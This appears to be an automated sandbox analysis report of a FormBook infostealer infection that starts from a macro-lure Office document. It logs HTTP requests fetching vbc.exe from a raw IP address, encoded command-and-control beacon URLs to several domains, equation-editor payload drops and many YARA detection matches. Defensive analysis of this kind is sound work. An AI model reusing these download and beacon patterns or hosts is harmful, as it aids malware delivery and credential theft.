            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Jan 2022 19:23:06 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Fri, 26 Jul 2019 13:18:26 GMTAccept-Ranges: bytesContent-Length: 2361Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 48 6f 73 70 65 64 61 67 65 6d 20 64 65 20 53 69 74 65 20 63 6f 6d 20 44 6f 6d c3 ad 6e 69 6f 20 47 72 c3 a1 74 69 73 20 2d 20 48 6f 73 74 47 61 74 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 
20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 35 37 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 35 37 78 35 37 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 37 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 37 36 78 37 36 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 39 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 39 36 78 39 36 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 31 32 38 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 32 38 78 31 32 38 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Jan 2022 19:23:11 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Fri, 14 Feb 2020 00:55:46 GMTAccept-Ranges: bytesContent-Length: 11816Vary: Accept-EncodingContent-Type: text/html
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Thu, 13 Jan 2022 19:23:17 GMTConnection: closeContent-Length: 1245
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: explorer.exe, 00000006.00000000.490268538.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
            Source: explorer.exe, 00000006.00000000.490268538.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
            Source: explorer.exe, 00000006.00000000.490268538.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
            Source: explorer.exe, 00000006.00000000.498056814.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://java.sun.com
            Source: explorer.exe, 00000006.00000000.530481363.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
            Source: explorer.exe, 00000006.00000000.530481363.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
            Source: explorer.exe, 00000006.00000000.506237385.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
            Source: explorer.exe, 00000006.00000000.501432004.0000000003E50000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
            Source: explorer.exe, 00000006.00000000.530481363.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
            Source: explorer.exe, 00000006.00000000.530481363.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
            Source: explorer.exe, 00000006.00000000.506237385.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
            Source: explorer.exe, 00000006.00000000.498056814.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
            Source: explorer.exe, 00000006.00000000.494238454.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
            Source: explorer.exe, 00000006.00000000.490268538.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
            Source: explorer.exe, 00000006.00000000.530481363.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
            Source: explorer.exe, 00000006.00000000.490268538.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
            Source: explorer.exe, 00000006.00000000.509280979.0000000004513000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
            Source: explorer.exe, 00000006.00000000.490268538.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
            Source: explorer.exe, 00000006.00000000.498056814.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://support.mozilla.org
            Source: explorer.exe, 00000006.00000000.498056814.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org
            Source: explorer.exe, 00000006.00000000.498056814.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\15A5C04C.emf
            Source: unknownDNS traffic detected: queries for: www.orphe.biz
            Source: global trafficHTTP traffic detected: GET /1155/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.23.213.59Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=oQMs787eFXVjqrc0kpDhsTH4zTzevw4glhch4r9T7Ws8YTYXIREY3A8O8bSOutLAC2pWew== HTTP/1.1Host: www.orphe.bizConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /i5nb/?7nqdxT7p=deof+8h2cV1ZhVyhzrGI39GlLFFvVq6Cbv4jXvKqou5r7IRZVEd6lg8tdgMKHVBHJLPsEg==&hPGx3Z=4ha06H5pmr HTTP/1.1Host: www.circlessalaries.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=1q0oPF09A/aJAPsKPuHQBkHWjjwJ/Gn81frD7rqKWOkW4wBsfhpWEnMiYvQLBvsNHCkSDA== HTTP/1.1Host: www.ylhwcl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /i5nb/?7nqdxT7p=mP9GS3thMR3+ARMxpcHmObplP0vLxCSJ1Uc4SKl6p1x9FFB9D/wfcJtU5Ejvu094ffKQCA==&hPGx3Z=4ha06H5pmr HTTP/1.1Host: www.terapiaholisticaemformacao.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=Sj6KkXOpjD24waER2SO9qkxuDKT2nEessjMBu43SnBr3kTZ7jjbG3Rbf9Jyaa70FTQT3zw== HTTP/1.1Host: www.ecommerceoptimise.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /i5nb/?7nqdxT7p=XDk63H3qWl+RMbiQoIY1xy2xxu1qCgv9HRxghgT+pSptcjNmJSn834JM0tAFFJwKE7XnKA==&hPGx3Z=4ha06H5pmr HTTP/1.1Host: www.integratedheartspsychology.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=0CWnzW05hIAETNGkljJOZJd5wMvHMv5oC+B2C7oDP+/j/H/Y+u+MlAecVwZThd0hAeRTKw== HTTP/1.1Host: www.bjbwx114.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

            E-Banking Fraud:

            Yara detected FormBook
            Source: Yara matchFile source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.vbc.exe.37b2e80.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.vbc.exe.375be60.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.481792338.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.511908771.000000000921C000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.686600488.0000000000690000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.481476255.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.503980554.000000000921C000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.520415665.0000000000260000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.489221730.0000000003619000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.686548955.0000000000430000.00000040.00020000.sdmp, type: MEMORY

            System Summary:

            Malicious sample detected (through community Yara rule)
            Source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 4.2.vbc.exe.37b2e80.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 4.2.vbc.exe.37b2e80.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 4.2.vbc.exe.375be60.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 4.2.vbc.exe.375be60.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000000.481792338.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000000.481792338.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000000.511908771.000000000921C000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000000.511908771.000000000921C000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000007.00000002.686600488.0000000000690000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000002.686600488.0000000000690000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000000.481476255.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000000.481476255.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000000.503980554.000000000921C000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000000.503980554.000000000921C000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.520415665.0000000000260000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.520415665.0000000000260000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000002.489221730.0000000003619000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000002.489221730.0000000003619000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000007.00000002.686548955.0000000000430000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000002.686548955.0000000000430000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
            Source: Screenshot number: 4Screenshot OCR: Enable Content from the yellow bar above 21 ^ 22 23 24 m. 25 m 26 27 m 28 29 ' 30 3
            Source: Screenshot number: 8Screenshot OCR: Enable Content from the yellow bar above 21 ^ 22 23 24 m. 25 m 26 27 m 28 29 ' 30 3
            Office equation editor drops PE file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exe
            Source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 4.2.vbc.exe.37b2e80.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 4.2.vbc.exe.37b2e80.5.raw.unpack, type: UNPACKEDPE - Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE - Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE - Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE - Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE - Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 4.2.vbc.exe.375be60.6.raw.unpack, type: UNPACKEDPE - Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 4.2.vbc.exe.375be60.6.raw.unpack, type: UNPACKEDPE - Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp, type: MEMORY - Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp, type: MEMORY - Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000000.481792338.0000000000400000.00000040.00000001.sdmp, type: MEMORY - Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000000.481792338.0000000000400000.00000040.00000001.sdmp, type: MEMORY - Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000000.511908771.000000000921C000.00000040.00020000.sdmp, type: MEMORY - Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000000.511908771.000000000921C000.00000040.00020000.sdmp, type: MEMORY - Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, type: MEMORY - Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, type: MEMORY - Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
